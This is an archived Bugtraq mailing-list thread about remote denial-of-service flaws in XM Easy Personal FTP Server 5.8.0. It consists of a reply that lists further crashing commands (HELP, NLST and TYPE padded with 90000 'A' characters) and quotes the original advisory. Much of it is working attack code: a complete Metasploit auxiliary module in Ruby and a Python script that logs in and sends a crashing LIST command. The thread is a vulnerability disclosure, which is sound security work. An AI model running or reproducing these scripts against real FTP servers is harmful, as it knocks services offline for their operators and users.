Bugtraq mailing list archives
Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
From: Protek Research Lab <protekresearchlab () yahoo ca>
Date: Tue, 10 Nov 2009 13:37:54 -0800 (PST)
Hi, It's seem to have much more bugs then what you listed in your advisory. It's possible to DoS the server with this 3 others commands; HELP ('A' * 90000) NLST ('A' * 90000) TYPE ('A' * 90000) Here is an auxiliary module for metasploit... require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS', 'Description' => %q{ You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call Type. }, 'Author' => 'Francis Provencher, Protek Research Lab', 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'References' => [ [ 'URL', ' http://protekresearch.blogspot.com] ], 'DisclosureDate' => '2009/11/10') ) # They're required register_options([ OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]), OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ]) ]) end def run return unless connect_login raw_send_recv("TYPE #{'A' * 90000}\r\n") disconnect print_status("OK, server may still be technically listening, but it won't respond") end end have a nice Day! --- On Tue, 11/10/09, zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn> wrote:
From: zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability To: bugtraq () securityfocus com Received: Tuesday, November 10, 2009, 3:07 AM Date of Discovery: 10-Nov-2009 Credits:zhangmc[at]mail.ustc.edu.cn Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first. Details: XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If you have logged on the server successfully,a "LIST" command will lead the ftp server to crash. Severity: High Exploit example: #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) r=sock.recv(1024) sock.send("LIST\r\n") sock.close() sys.exit(0);
__________________________________________________________________ The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/
Current thread:
- XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability zhangmc (Nov 10)
- Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability Protek Research Lab (Nov 12)